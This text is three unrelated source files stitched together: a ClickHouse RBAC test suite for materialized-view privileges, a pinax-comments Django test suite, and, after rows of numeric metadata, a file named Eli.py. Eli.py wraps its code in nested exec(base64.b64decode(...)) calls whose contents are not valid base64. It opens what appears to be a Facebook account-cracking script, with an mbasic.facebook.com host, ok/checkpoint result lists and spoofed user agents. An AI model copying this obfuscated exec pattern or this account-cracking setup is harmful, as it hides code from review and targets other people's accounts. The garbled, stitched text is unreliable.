            # Without SELECT on any referenced table the ALTER must be rejected.
            with Then("I attempt to modify the view query as the user"):
                node.query(
                    modify_query_view_query.format(
                        view_name=view_name,
                        table0_name=table0_name,
                        table1_name=table1_name,
                        table2_name=table2_name,
                        table3_name=table3_name,
                        table4_name=table4_name,
                    ),
                    settings=[("user", f"{user_name}")],
                    exitcode=exitcode,
                    message=message,
                )
            # Partial SELECT grants over the five tables — ALTER must keep
            # failing for each incomplete subset.
            for permutation in permutations(table_count=5):
                with grant_select_on_table(
                    node,
                    permutation,
                    grant_target_name,
                    table0_name,
                    table1_name,
                    table2_name,
                    table3_name,
                    table4_name,
                ) as tables_granted:
                    with When(
                        f"permutation={permutation}, tables granted = {tables_granted}"
                    ):
                        with Then("I attempt to modify the view query as the user"):
                            node.query(
                                modify_query_view_query.format(
                                    view_name=view_name,
                                    table0_name=table0_name,
                                    table1_name=table1_name,
                                    table2_name=table2_name,
                                    table3_name=table3_name,
                                    table4_name=table4_name,
                                ),
                                settings=[("user", f"{user_name}")],
                                exitcode=exitcode,
                                message=message,
                            )
            # With SELECT on every table the ALTER must succeed.
            with When("I grant select on all tables"):
                with grant_select_on_table(
                    node,
                    max(permutations(table_count=5)) + 1,
                    grant_target_name,
                    table0_name,
                    table1_name,
                    table2_name,
                    table3_name,
                    table4_name,
                ):
                    with Then("I attempt to modify the view query as the user"):
                        node.query(
                            modify_query_view_query.format(
                                view_name=view_name,
                                table0_name=table0_name,
                                table1_name=table1_name,
                                table2_name=table2_name,
                                table3_name=table3_name,
                                table4_name=table4_name,
                            ),
                            settings=[("user", f"{user_name}")],
                        )
        finally:
            with Finally("I drop the view"):
                node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def modify_query_with_nested_views_privilege_granted_directly_or_via_role(
    self, node=None
):
    """Check that the user can modify the view query to include other views if
    and only if they hold MODIFY QUERY on the view plus SELECT on all of the
    views and their source tables, either directly or through a role.
    """
    user_name = f"user_{getuid()}"
    role_name = f"role_{getuid()}"
    node = self.context.node if node is None else node

    # Case 1: privileges granted directly to the user.
    with user(node, user_name):
        direct = Scenario(
            test=modify_query_with_nested_views,
            name="modify query with nested views, privilege granted directly",
        )
        direct(grant_target_name=user_name, user_name=user_name)

    # Case 2: privileges granted through a role held by the user.
    with user(node, user_name), role(node, role_name):
        with When("I grant the role to the user"):
            node.query(f"GRANT {role_name} TO {user_name}")
        via_role = Scenario(
            test=modify_query_with_nested_views,
            name="modify query with nested views, privilege granted through a role",
        )
        via_role(grant_target_name=role_name, user_name=user_name)
@TestOutline
def modify_query_with_nested_views(self, grant_target_name, user_name, node=None):
    """Grant MODIFY QUERY on view and SELECT on the tables and views in the modified query and check the user is able to modify the view query
    if and only if they have SELECT privilege on all of them.

    view3 is the view being modified; the new query reads view2, which is
    built on view1 -> view0 -> table0, so the user needs SELECT on the whole
    dependency chain plus table3.
    """
    view0_name = f"view0_{getuid()}"
    view1_name = f"view1_{getuid()}"
    view2_name = f"view2_{getuid()}"
    view3_name = f"view3_{getuid()}"
    table0_name = f"table0_{getuid()}"
    table1_name = f"table1_{getuid()}"
    table2_name = f"table2_{getuid()}"
    table3_name = f"table3_{getuid()}"
    # Expected failure for every attempt made without full SELECT coverage.
    exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
    modify_query_view_query = "ALTER TABLE {view3_name} MODIFY QUERY SELECT y FROM {view2_name} UNION ALL SELECT y FROM {table3_name}"
    if node is None:
        node = self.context.node
    with table(node, f"{table0_name},{table1_name},{table2_name},{table3_name}"):
        try:
            with Given("I have some views"):
                node.query(f"CREATE VIEW {view0_name} AS SELECT y FROM {table0_name}")
                node.query(
                    f"CREATE VIEW {view1_name} AS SELECT y FROM {view0_name} WHERE y IN (SELECT y FROM {table1_name} WHERE y<2)"
                )
                node.query(
                    f"CREATE VIEW {view2_name} AS SELECT y FROM {view1_name} JOIN {table2_name} USING y"
                )
                node.query(f"CREATE VIEW {view3_name} AS SELECT 1")
            with When("I grant MODIFY QUERY privilege on view"):
                node.query(
                    f"GRANT ALTER VIEW MODIFY QUERY ON {view3_name} TO {grant_target_name}"
                )
            # Without SELECT on the referenced views/tables the ALTER must fail.
            with Then("I attempt to modify the view query as the user"):
                node.query(
                    modify_query_view_query.format(
                        view3_name=view3_name,
                        view2_name=view2_name,
                        table3_name=table3_name,
                    ),
                    settings=[("user", f"{user_name}")],
                    exitcode=exitcode,
                    message=message,
                )
            # Indexing the 2-tuple by the boolean stress flag: False (0) runs a
            # curated subset of permutations, True (1) runs all of them.
            for permutation in (
                [0, 1, 2, 3, 7, 11, 15, 31, 39, 79, 95],
                permutations(table_count=7),
            )[self.context.stress]:
                with grant_select_on_table(
                    node,
                    permutation,
                    grant_target_name,
                    view2_name,
                    table3_name,
                    view1_name,
                    table2_name,
                    view0_name,
                    table1_name,
                    table0_name,
                ) as tables_granted:
                    with When(
                        f"permutation={permutation}, tables granted = {tables_granted}"
                    ):
                        with Then("I attempt to modify the view query as the user"):
                            node.query(
                                modify_query_view_query.format(
                                    view3_name=view3_name,
                                    view2_name=view2_name,
                                    table3_name=table3_name,
                                ),
                                settings=[("user", f"{user_name}")],
                                exitcode=exitcode,
                                message=message,
                            )
            # With SELECT on every view and table the ALTER must succeed.
            with When("I grant select on all views"):
                with grant_select_on_table(
                    node,
                    max(permutations(table_count=7)) + 1,
                    grant_target_name,
                    view0_name,
                    view1_name,
                    view2_name,
                    table0_name,
                    table1_name,
                    table2_name,
                    table3_name,
                ):
                    with Then("I attempt to modify the view query as the user"):
                        node.query(
                            modify_query_view_query.format(
                                view3_name=view3_name,
                                view2_name=view2_name,
                                table3_name=table3_name,
                            ),
                            settings=[("user", f"{user_name}")],
                        )
        finally:
            with Finally("I drop the views"):
                # Drop dependents first (view3 -> view0). The step labels
                # previously named the opposite views; fixed to match the
                # view actually dropped.
                with When("I drop view3", flags=TE):
                    node.query(f"DROP VIEW IF EXISTS {view3_name}")
                with And("I drop view2", flags=TE):
                    node.query(f"DROP VIEW IF EXISTS {view2_name}")
                with And("I drop view1", flags=TE):
                    node.query(f"DROP VIEW IF EXISTS {view1_name}")
                with And("I drop view0", flags=TE):
                    node.query(f"DROP VIEW IF EXISTS {view0_name}")
@TestSuite
def insert(self, node=None):
    """Check RBAC functionality of INSERT with materialized views."""
    scenarios = (
        insert_on_source_table_privilege_granted_directly_or_via_role,
        insert_with_privilege_granted_directly_or_via_role,
        insert_on_target_table_privilege_granted_directly_or_via_role,
    )
    # Run each scenario sequentially with server-log instrumentation.
    for scenario in scenarios:
        Scenario(run=scenario, setup=instrument_clickhouse_server_log)
@TestScenario
@Requirements(
    RQ_SRS_006_RBAC_MaterializedView_Insert_SourceTable("1.0"),
)
def insert_on_source_table_privilege_granted_directly_or_via_role(self, node=None):
    """Check that the user can INSERT into the source table of the materialized
    view with only INSERT privilege on the source table.
    """
    user_name = f"user_{getuid()}"
    role_name = f"role_{getuid()}"
    node = self.context.node if node is None else node

    # Case 1: privilege granted directly to the user.
    with user(node, user_name):
        direct = Scenario(
            test=insert_on_source_table,
            name="insert on source table, privilege granted directly",
        )
        direct(grant_target_name=user_name, user_name=user_name)

    # Case 2: privilege granted through a role held by the user.
    with user(node, user_name), role(node, role_name):
        with When("I grant the role to the user"):
            node.query(f"GRANT {role_name} TO {user_name}")
        via_role = Scenario(
            test=insert_on_source_table,
            name="insert on source table, privilege granted through a role",
        )
        via_role(grant_target_name=role_name, user_name=user_name)
@TestOutline
def insert_on_source_table(self, grant_target_name, user_name, node=None):
    """Grant INSERT on the source table to the user and check they are able to INSERT into it."""
    view_name = f"view_{getuid()}"
    table0_name = f"table0_{getuid()}"
    table1_name = f"table1_{getuid()}"
    if node is None:
        node = self.context.node
    with table(node, f"{table0_name},{table1_name}"):
        try:
            # table0 is the explicit target, table1 is the source the view reads.
            with Given("I have a view"):
                node.query(f"DROP VIEW IF EXISTS {view_name}")
                node.query(
                    f"CREATE MATERIALIZED VIEW {view_name} TO {table0_name} AS SELECT * FROM {table1_name}"
                )
            with When("I grant INSERT on the source table"):
                node.query(f"GRANT INSERT ON {table1_name} TO {grant_target_name}")
            # Only INSERT on the source table is granted; the insert must work.
            with Then("I attempt to insert into the source table"):
                node.query(
                    f"INSERT INTO {table1_name}(d) VALUES ('2020-01-01')",
                    settings=[("user", f"{user_name}")],
                )
        finally:
            with Finally("I drop the view"):
                node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
@Requirements(
    RQ_SRS_006_RBAC_MaterializedView_Insert("1.0"),
)
def insert_with_privilege_granted_directly_or_via_role(self, node=None):
    """Check that the user can INSERT into a materialized view if and only if
    they hold INSERT privilege for the view, directly or through a role.
    """
    user_name = f"user_{getuid()}"
    role_name = f"role_{getuid()}"
    node = self.context.node if node is None else node

    # Case 1: privilege granted directly to the user.
    with user(node, user_name):
        direct = Scenario(
            test=insert_with_insert_privilege,
            name="insert on view, privilege granted directly",
        )
        direct(grant_target_name=user_name, user_name=user_name)

    # Case 2: privilege granted through a role held by the user.
    with user(node, user_name), role(node, role_name):
        with When("I grant the role to the user"):
            node.query(f"GRANT {role_name} TO {user_name}")
        via_role = Scenario(
            test=insert_with_insert_privilege,
            name="insert on view, privilege granted through a role",
        )
        via_role(grant_target_name=role_name, user_name=user_name)
@TestOutline
def insert_with_insert_privilege(self, grant_target_name, user_name, node=None):
    """Grant INSERT on the materialized view and verify the user can insert
    into the view.
    """
    view_name = f"view_{getuid()}"
    table0_name = f"table0_{getuid()}"
    table1_name = f"table1_{getuid()}"
    exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
    node = self.context.node if node is None else node

    with table(node, f"{table0_name},{table1_name}"):
        try:
            # table0 is the explicit target; table1 is the source.
            with Given("I have a view"):
                node.query(f"DROP VIEW IF EXISTS {view_name}")
                create_view = (
                    f"CREATE MATERIALIZED VIEW {view_name} "
                    f"TO {table0_name} AS SELECT * FROM {table1_name}"
                )
                node.query(create_view)

            with When("I grant INSERT on the view"):
                node.query(f"GRANT INSERT ON {view_name} TO {grant_target_name}")

            with Then("I attempt to insert into the view"):
                insert_query = f"INSERT INTO {view_name}(d) VALUES ('2020-01-01')"
                node.query(insert_query, settings=[("user", user_name)])
        finally:
            with Finally("I drop the view"):
                node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
@Requirements(
    RQ_SRS_006_RBAC_MaterializedView_Insert_TargetTable("1.0"),
)
def insert_on_target_table_privilege_granted_directly_or_via_role(self, node=None):
    """Check that the user can INSERT into the target table of a materialized
    view if and only if they hold INSERT privilege for the table, directly or
    through a role.
    """
    user_name = f"user_{getuid()}"
    role_name = f"role_{getuid()}"
    node = self.context.node if node is None else node

    # Case 1: privilege granted directly to the user.
    with user(node, user_name):
        direct = Scenario(
            test=insert_on_target_table,
            name="insert on target table, privilege granted directly",
        )
        direct(grant_target_name=user_name, user_name=user_name)

    # Case 2: privilege granted through a role held by the user.
    with user(node, user_name), role(node, role_name):
        with When("I grant the role to the user"):
            node.query(f"GRANT {role_name} TO {user_name}")
        via_role = Scenario(
            test=insert_on_target_table,
            name="insert on target table, privilege granted through a role",
        )
        via_role(grant_target_name=role_name, user_name=user_name)
@TestOutline
def insert_on_target_table(self, grant_target_name, user_name, node=None):
    """Grant INSERT and check user is able to INSERT into target table.

    NOTE(review): a second module-level ``insert_on_target_table`` (the
    implicit-target-table variant) is defined later in this file; since both
    share the name, the later definition shadows this one at import time, so
    any Scenario referencing ``insert_on_target_table`` actually runs the
    implicit variant — rename one of them. TODO confirm intended behavior.
    """
    view_name = f"view_{getuid()}"
    table0_name = f"table0_{getuid()}"
    table1_name = f"table1_{getuid()}"
    if node is None:
        node = self.context.node
    with table(node, f"{table0_name},{table1_name}"):
        try:
            # table0 is the explicit target, table1 is the source.
            with Given("I have a view"):
                node.query(f"DROP VIEW IF EXISTS {view_name}")
                node.query(
                    f"CREATE MATERIALIZED VIEW {view_name} TO {table0_name} AS SELECT * FROM {table1_name}"
                )
            with When("I grant INSERT on the target table"):
                node.query(f"GRANT INSERT ON {table0_name} TO {grant_target_name}")
            with Then("I attempt to insert into the target table"):
                node.query(
                    f"INSERT INTO {table0_name}(d) VALUES ('2020-01-01')",
                    settings=[("user", f"{user_name}")],
                )
        finally:
            with Finally("I drop the view"):
                node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
@Requirements(
    RQ_SRS_006_RBAC_MaterializedView_Insert_TargetTable("1.0"),
)
def insert_on_implicit_target_table_privilege_granted_directly_or_via_role(
    self, node=None
):
    """Check that user is able to INSERT into the implicit target table of a materialized view if and only if they have INSERT privilege for the table,
    either directly or through a role.
    """
    user_name = f"user_{getuid()}"
    role_name = f"role_{getuid()}"
    if node is None:
        node = self.context.node
    with user(node, f"{user_name}"):
        Scenario(
            test=insert_on_implicit_target_table,
            name="insert on implicit target table, privilege granted directly",
        )(grant_target_name=user_name, user_name=user_name)
    with user(node, f"{user_name}"), role(node, f"{role_name}"):
        with When("I grant the role to the user"):
            node.query(f"GRANT {role_name} TO {user_name}")
        Scenario(
            test=insert_on_implicit_target_table,
            name="insert on implicit target table, privilege granted through a role",
        )(grant_target_name=role_name, user_name=user_name)


@TestOutline
def insert_on_implicit_target_table(self, grant_target_name, user_name, node=None):
    """Grant INSERT and check user is able to INSERT into the implicit
    (".inner") target table of a materialized view.

    Renamed from ``insert_on_target_table``: that name collided with the
    explicit-target-table outline defined earlier in this module, and the
    duplicate silently shadowed the earlier definition at import time.
    """
    view_name = f"view_{getuid()}"
    table_name = f"table0_{getuid()}"
    # A materialized view created without TO stores data in ".inner.<view>".
    implicit_table_name = f'\\".inner.{view_name}\\"'
    if node is None:
        node = self.context.node
    with table(node, f"{table_name}"):
        try:
            with Given("I have a view"):
                node.query(f"DROP VIEW IF EXISTS {view_name}")
                node.query(
                    f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT * FROM {table_name}"
                )
            with When("I grant INSERT on the target table"):
                node.query(
                    f"GRANT INSERT ON {implicit_table_name} TO {grant_target_name}"
                )
            with Then("I attempt to insert into the target table"):
                node.query(
                    f"INSERT INTO {implicit_table_name}(d) VALUES ('2020-01-01')",
                    settings=[("user", f"{user_name}")],
                )
        finally:
            with Finally("I drop the view"):
                node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestFeature
@Requirements(
    RQ_SRS_006_RBAC_MaterializedView("1.0"),
)
@Name("materialized view")
def feature(self, stress=None, node="clickhouse1"):
    """Entry point for the materialized view RBAC feature.

    Binds the cluster node into the test context, optionally overrides the
    stress flag, then runs every Suite defined in this module in parallel on a
    pool of 3 executors.
    """
    self.context.node = self.context.cluster.node(node)
    if stress is not None:
        self.context.stress = stress
    with Pool(3) as pool:
        try:
            # loads() presumably discovers all Suite-typed tests in this module.
            for suite in loads(current_module(), Suite):
                Suite(test=suite, parallel=True, executor=pool)
        finally:
            # Wait for all parallel suites before leaving the pool.
            join()
| 41.592853
| 266
| 0.572036
| 17,290
| 141,998
| 4.479294
| 0.012724
| 0.051648
| 0.033313
| 0.022932
| 0.975377
| 0.969695
| 0.960567
| 0.952716
| 0.947616
| 0.938022
| 0
| 0.009026
| 0.339174
| 141,998
| 3,413
| 267
| 41.60504
| 0.816318
| 0.083219
| 0
| 0.819277
| 0
| 0.006024
| 0.26737
| 0.011461
| 0
| 0
| 0
| 0
| 0.002126
| 1
| 0.030829
| false
| 0.000354
| 0.001772
| 0
| 0.032601
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0aa24df4982c15b5a1e452252b55a6186eaceb25
| 11,517
|
py
|
Python
|
pinax/comments/tests/tests.py
|
rosscdh/pinax-comments
|
266632ef22b7fd922a8d3ffd6eabdac71e2385d9
|
[
"MIT"
] | 59
|
2015-12-15T22:53:40.000Z
|
2021-07-06T03:28:49.000Z
|
pinax/comments/tests/tests.py
|
rosscdh/pinax-comments
|
266632ef22b7fd922a8d3ffd6eabdac71e2385d9
|
[
"MIT"
] | 22
|
2015-10-01T14:34:50.000Z
|
2021-07-27T09:49:33.000Z
|
pinax/comments/tests/tests.py
|
rosscdh/pinax-comments
|
266632ef22b7fd922a8d3ffd6eabdac71e2385d9
|
[
"MIT"
] | 19
|
2016-01-27T17:41:35.000Z
|
2021-09-22T09:30:50.000Z
|
from django.contrib.contenttypes.models import ContentType
from django.template import Context, Template
from django.urls import reverse
from pinax.comments.forms import CommentForm
from pinax.comments.models import Comment
from .models import Demo
from .test import TestCase
class TestCaseMixin(TestCase):
    """Request/rendering helpers shared by the comment test cases.

    NOTE(review): ``get``, ``getajax`` and ``post_ajax`` call ``self.get`` /
    ``self.post`` with an already-reversed URL — as written, ``get`` appears
    to recurse into itself. Presumably the base ``TestCase`` (from ``.test``)
    is expected to supply client-style helpers; TODO confirm, or these should
    call ``self.client.get`` / ``self.client.post``.
    """
    def get(self, url_name, *args, **kwargs):
        # "data" is popped out; remaining kwargs become URL kwargs for reverse().
        data = kwargs.pop("data", {})
        return self.get(reverse(url_name, args=args, kwargs=kwargs), data)
    def getajax(self, url_name, *args, **kwargs):
        # Same as get() but marks the request as AJAX via X-Requested-With.
        data = kwargs.pop("data", {})
        return self.get(reverse(url_name, args=args, kwargs=kwargs), data,
                        HTTP_X_REQUESTED_WITH="XMLHttpRequest")
    def post_comment_2(self, url_name, *args, **kwargs):
        # NOTE(review): unlike the other helpers this one does not reverse()
        # the namespaced url_name and forwards args/kwargs as keyword
        # arguments to self.post — verify against the base class's post().
        url_name = "pinax_comments:" + url_name
        return self.post(url_name, args=args, kwargs=kwargs)
    def post_ajax(self, url_name, *args, **kwargs):
        # POST variant of getajax(): reversed URL, AJAX header set.
        data = kwargs.pop("data", {})
        return self.post(reverse(url_name, args=args, kwargs=kwargs), data,
                         HTTP_X_REQUESTED_WITH="XMLHttpRequest")
    def reload(self, obj):
        # Re-fetch obj from the database: fresh instance with the same pk.
        return obj.__class__._default_manager.get(pk=obj.pk)
    def assert_renders(self, tmpl, context, value):
        # Render the template source with the given context and compare.
        tmpl = Template(tmpl)
        self.assertEqual(tmpl.render(context), value)
class CommentTests(TestCaseMixin):
def setUp(self):
super().setUp()
self.gimli = self.make_user(username="gimli")
self.aragorn = self.make_user(username="aragorn")
def assert_renders(self, tmpl, context, value):
tmpl = Template(tmpl)
self.assertEqual(tmpl.render(context), value)
def post_comment(self, obj, data, **kwargs):
return self.post(
"pinax_comments:post_comment",
content_type_id=ContentType.objects.get_for_model(obj).pk,
object_id=obj.pk,
data=data,
**kwargs
)
def test_post_comment(self):
d = Demo.objects.create(name="Wizard")
response = self.post_comment(d, data={
"name": "Frodo Baggins",
"comment": "Where'd you go?",
})
self.response_302(response)
self.assertEqual(Comment.objects.count(), 1)
c = Comment.objects.get()
self.assertEqual(c.author, None)
self.assertEqual(c.name, "Frodo Baggins")
response = self.post_comment(d, data={
"comment": "Where is everyone?"
})
self.assertEqual(Comment.objects.count(), 1)
with self.login(self.gimli):
response = self.post_comment(d, data={
"comment": "I thought you were watching the hobbits?"
})
self.response_302(response)
self.assertEqual(Comment.objects.count(), 2)
c = Comment.objects.order_by("id")[1]
self.assertEqual(c.comment, "I thought you were watching the hobbits?")
self.assertEqual(c.author, self.gimli)
def test_ajax_post_comment(self):
"""Verify comment created via AJAX"""
d = Demo.objects.create(name="Wizard")
response = self.post_comment(d, data={
"name": "Frodo Baggins",
"comment": "Where'd you go?",
}, extra=dict(HTTP_X_REQUESTED_WITH="XMLHttpRequest"))
self.response_200(response)
self.assertEqual(Comment.objects.count(), 1)
c = Comment.objects.get()
self.assertEqual(c.author, None)
self.assertEqual(c.name, "Frodo Baggins")
def test_ajax_post_comment_bad_data(self):
"""Verify no comment created if form data is invalid"""
d = Demo.objects.create(name="Wizard")
response = self.post_comment(d, data={
"artist": "Frida Kahlo",
"comment": "Where'd you go?",
}, extra=dict(HTTP_X_REQUESTED_WITH="XMLHttpRequest"))
self.response_200(response)
# Ensure no comment was created
self.assertEqual(Comment.objects.count(), 0)
def test_update_comment(self):
"""Ensure existing comment is updated"""
d = Demo.objects.create(name="Wizard")
with self.login(self.gimli):
response = self.post_comment(d, data={
"comment": "Wow, you're a jerk.",
})
comment = Comment.objects.get()
new_comment = "Oops, wrong wizard! You are wonderful!"
post_data = dict(comment=new_comment)
response = self.post(
"pinax_comments:edit_comment",
pk=comment.pk,
data=post_data,
)
self.assertEqual(response.status_code, 302)
comment.refresh_from_db()
self.assertEqual(comment.comment, new_comment)
def test_ajax_update_comment(self):
"""Ensure existing comment is updated"""
d = Demo.objects.create(name="Wizard")
with self.login(self.gimli):
self.post_comment(d, data={
"comment": "Wow, you're a jerk.",
})
comment = Comment.objects.get()
new_comment = "Oops, wrong wizard! You are wonderful!"
post_data = dict(comment=new_comment)
response = self.post(
"pinax_comments:edit_comment",
pk=comment.pk,
data=post_data,
extra=dict(HTTP_X_REQUESTED_WITH="XMLHttpRequest")
)
self.assertEqual(response.status_code, 200)
comment.refresh_from_db()
self.assertEqual(comment.comment, new_comment)
def test_delete_comment(self):
d = Demo.objects.create(name="Wizard")
with self.login(self.gimli):
response = self.post_comment(d, data={
"comment": "Wow, you're a jerk.",
})
comment = Comment.objects.get()
# Anonymous user cannot delete
response = self.post("pinax_comments:delete_comment", pk=comment.pk)
self.response_302(response)
self.assertEqual(Comment.objects.count(), 1)
# User is not comment author, cannot delete
with self.login(self.aragorn):
response = self.post("pinax_comments:delete_comment", pk=comment.pk)
self.assertEqual(response.status_code, 302)
self.assertEqual(Comment.objects.count(), 1)
# Comment author can delete
with self.login(self.gimli):
response = self.post("pinax_comments:delete_comment", pk=comment.pk)
self.assertEqual(response.status_code, 302)
self.assertEqual(Comment.objects.count(), 0)
def test_ajax_delete_comment(self):
d = Demo.objects.create(name="Wizard")
with self.login(self.gimli):
response = self.post_comment(d, data={
"comment": "Wow, you're a jerk.",
})
comment = Comment.objects.get()
response = self.post(
"pinax_comments:delete_comment",
pk=comment.pk,
extra=dict(HTTP_X_REQUESTED_WITH="XMLHttpRequest")
)
self.assertEqual(response.status_code, 200)
# Verify comment is deleted
self.assertEqual(Comment.objects.count(), 0)
def test_ajax_delete_comment_wrong_user(self):
    """Non-author AJAX delete responds 200 but must NOT remove the comment.

    Note the view still answers 200 on the AJAX path even when the
    requester lacks permission; the assertion on the row count is
    what proves the delete was refused.
    """
    d = Demo.objects.create(name="Wizard")
    with self.login(self.gimli):
        response = self.post_comment(d, data={
            "comment": "Wow, you're a jerk.",
        })
    comment = Comment.objects.get()
    with self.login(self.aragorn):
        response = self.post(
            "pinax_comments:delete_comment",
            pk=comment.pk,
            # Marks the request as AJAX for the view.
            extra=dict(HTTP_X_REQUESTED_WITH="XMLHttpRequest")
        )
        self.assertEqual(response.status_code, 200)
        # Verify comment is not deleted
        self.assertEqual(Comment.objects.count(), 1)
def test_ttag_comment_count(self):
    """Template tag {% comment_count %} renders the number of comments.

    Posts two anonymous comments on the object, then renders the tag
    and expects the literal string "2".
    """
    d = Demo.objects.create(name="Wizard")
    self.post_comment(d, data={
        "name": "Gandalf",
        "comment": "You can't win",
    })
    self.post_comment(d, data={
        "name": "Gollum",
        "comment": "We wants our precious",
    })
    self.assert_renders(
        "{% load pinax_comments_tags %}{% comment_count o %}",
        Context({"o": d}),
        "2"
    )
def test_ttag_comments(self):
    """Template tag {% comments o as cs %} stores the queryset in context.

    The tag itself renders nothing (""); the assertion then compares
    the context variable `cs` against all Comment rows.
    """
    d = Demo.objects.create(name="Wizard")
    self.post_comment(d, data={
        "name": "Gandalf",
        "comment": "You can't win",
    })
    self.post_comment(d, data={
        "name": "Gollum",
        "comment": "We wants our precious",
    })
    c = Context({"o": d})
    self.assert_renders(
        "{% load pinax_comments_tags %}{% comments o as cs %}",
        c,
        ""
    )
    # The tag's side effect is the context variable, not rendered output.
    self.assertEqual(list(c["cs"]), list(Comment.objects.all()))
def test_ttag_comment_form(self):
    """Template tag {% comment_form %} exposes a CommentForm in context.

    Exercised twice: once anonymously and once as a logged-in user
    (with `user` present in the template context); both paths must
    yield a CommentForm instance and render no output.
    """
    d = Demo.objects.create(name="Wizard")
    c = Context({"o": d})
    self.assert_renders(
        "{% load pinax_comments_tags %}{% comment_form o as comment_form %}",
        c,
        ""
    )
    self.assertTrue(isinstance(c["comment_form"], CommentForm))
    with self.login(self.gimli):
        c = Context({"o": d, "user": self.gimli})
        self.assert_renders(
            "{% load pinax_comments_tags %}{% comment_form o as comment_form %}",
            c,
            ""
        )
        self.assertTrue(isinstance(c["comment_form"], CommentForm))
def test_ttag_comment_target(self):
    """Template tag {% comment_target %} renders the comment-post URL.

    Expected URL shape is /comment/<content_type_pk>/<object_pk>/.
    """
    d = Demo.objects.create(name="Wizard")
    self.assert_renders(
        "{% load pinax_comments_tags %}{% comment_target o %}",
        Context({"o": d}),
        "/comment/%d/%d/" % (ContentType.objects.get_for_model(d).pk, d.pk)
    )
def test_ttag_can_edit_comment(self):
    """Filter can_edit_comment is True for the author, False otherwise.

    Renders the same template twice with a different `user` in
    context and compares the literal "True"/"False" output.
    """
    d = Demo.objects.create(name="Wizard")
    with self.login(self.gimli):
        self.post_comment(d, data={
            "name": "Gandalf",
            "comment": "You can't win",
        })
    comment = Comment.objects.get()
    self.assert_renders(
        "{% load pinax_comments_tags %}{% if comment|can_edit_comment:user %}True{% else %}False{% endif %}",
        Context({"comment": comment, "user": self.gimli}),
        "True"
    )
    self.assert_renders(
        "{% load pinax_comments_tags %}{% if comment|can_edit_comment:user %}True{% else %}False{% endif %}",
        Context({"comment": comment, "user": self.aragorn}),
        "False"
    )
def test_ttag_can_delete_comment(self):
    """Filter can_delete_comment is True for the author, False otherwise.

    Mirrors test_ttag_can_edit_comment but for the delete-permission
    template filter.
    """
    d = Demo.objects.create(name="Wizard")
    with self.login(self.gimli):
        self.post_comment(d, data={
            "name": "Gandalf",
            "comment": "You can't win",
        })
    comment = Comment.objects.get()
    self.assert_renders(
        "{% load pinax_comments_tags %}{% if comment|can_delete_comment:user %}True{% else %}False{% endif %}",
        Context({"comment": comment, "user": self.gimli}),
        "True"
    )
    self.assert_renders(
        "{% load pinax_comments_tags %}{% if comment|can_delete_comment:user %}True{% else %}False{% endif %}",
        Context({"comment": comment, "user": self.aragorn}),
        "False"
    )
| 35.990625
| 115
| 0.570548
| 1,290
| 11,517
| 4.94031
| 0.120155
| 0.063549
| 0.040169
| 0.040169
| 0.814059
| 0.789424
| 0.766201
| 0.755688
| 0.724776
| 0.70375
| 0
| 0.005723
| 0.302075
| 11,517
| 319
| 116
| 36.103448
| 0.787136
| 0.029087
| 0
| 0.719231
| 0
| 0
| 0.17085
| 0.031015
| 0
| 0
| 0
| 0
| 0.153846
| 1
| 0.088462
| false
| 0
| 0.026923
| 0.007692
| 0.146154
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0ae4b921988ff8f3e644427ae27646a4e2ab60e4
| 244,320
|
py
|
Python
|
Eli.py
|
GUPTA-SHAKEL/Elite
|
7f58bdf54f1bd0ef9debcaeb18282690e310abe7
|
[
"MIT"
] | null | null | null |
Eli.py
|
GUPTA-SHAKEL/Elite
|
7f58bdf54f1bd0ef9debcaeb18282690e310abe7
|
[
"MIT"
] | null | null | null |
Eli.py
|
GUPTA-SHAKEL/Elite
|
7f58bdf54f1bd0ef9debcaeb18282690e310abe7
|
[
"MIT"
] | null | null | null |
import base64
exec(base64.b64decode("import base64
exec(base64.b64decode("import base64
exec(base64.b64decode("import base64
exec(base64.b64decode("# Coded by Mark Cornel
# with (uncompyle6) version : 3.7.4
# Time Succes coded : 2022-7-1 15:47:11.403269
import requests,bs4,sys,os,random,time,re,json,uuid,subprocess
from random import randint
from concurrent.futures import ThreadPoolExecutor as ThreadPool
from bs4 import BeautifulSoup as par
from datetime import date
from datetime import datetime
from urllib.parse import quote
P = "\x1b[0;97m" # Putih
M = "\x1b[0;91m" # Merah
H = "\x1b[0;92m" # Hijau
K = "\x1b[0;93m" # Kuning
B = "\x1b[0;94m" # Biru
U = "\x1b[0;95m" # Ungu
O = "\x1b[0;96m" # Biru Muda
N = "\033[0m"    # Warna Mati
url_license = 'https://app.cryptolens.io/product/detail/13642'
host = "https://mbasic.facebook.com"
ok = []
cp = []
ttl = []
current = datetime.now()
ta = current.year
bu = current.month
ha = current.day
bulan_ttl = {"01": "January", "02": "February", "03": "March", "04": "April", "05": "May", "06": "June", "07": "July", "08": "August", "09": "September", "10": "October", "11": "November", "12": "December"}
bulan = ["January", "February", "March", "April", "May", "June", "July", "August", "September", "October", "November", "December"]
try:
    if bu < 0 or bu > 12:
        exit()
    buTemp = bu - 1
except ValueError:
    exit()
op = bulan[buTemp]
tanggal = ("%s-%s-%s"%(ha,op,ta))
ua_xiaomi  = 'Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]'
ua_nokia   = 'nokiac3-00/5.0 (07.20) profile/midp-2.1 configuration/cldc-1.1 mozilla/5.0 applewebkit/420+ (khtml, like gecko) safari/420+'
